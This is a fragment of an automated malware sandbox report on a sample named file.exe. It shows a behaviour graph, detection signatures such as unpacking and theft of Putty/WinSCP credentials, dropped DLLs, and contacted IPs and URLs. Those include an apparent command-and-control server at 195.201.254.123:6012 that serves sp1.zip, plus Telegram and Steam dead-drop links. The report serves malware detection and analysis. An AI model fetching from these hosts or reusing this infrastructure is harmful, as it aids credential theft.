  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1301138 Sample: file.exe Startdate: 31/08/2023 Architecture: WINDOWS Score: 100 19 t.me 2->19 25 Found malware configuration 2->25 27 Malicious sample detected (through community Yara rule) 2->27 29 Multi AV Scanner detection for submitted file 2->29 31 5 other signatures 2->31 6 file.exe 36 2->6         started        signatures3 process4 dnsIp5 21 t.me 149.154.167.99, 443, 49773 TELEGRAMRU United Kingdom 6->21 23 195.201.254.123, 49774, 6012 HETZNER-ASDE Germany 6->23 11 C:\ProgramData\vcruntime140.dll, PE32 6->11 dropped 13 C:\ProgramData\softokn3.dll, PE32 6->13 dropped 15 C:\ProgramData\nss3.dll, PE32 6->15 dropped 17 3 other files (none is malicious) 6->17 dropped 33 Detected unpacking (changes PE section rights) 6->33 35 Detected unpacking (overwrites its own PE header) 6->35 37 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 6->37 39 4 other signatures 6->39 file6 signatures7
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.99
 t.me United Kingdom
62041 TELEGRAMRU false
195.201.254.123
 unknown Germany
24940 HETZNER-ASDE false

Contacted Domains

Name IP Active
t.me 149.154.167.99 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://195.201.254.123:6012/sp1.zip false
  • Avira URL Cloud: safe
 unknown
http://195.201.254.123:6012/b2ced91faf30889899f34458f95b8e93 false
  • Avira URL Cloud: safe
 unknown
https://steamcommunity.com/profiles/76561199545993403 false
    		high
    http://195.201.254.123:6012/ false
    • Avira URL Cloud: safe
    		 unknown
    https://t.me/vogogor false
      		high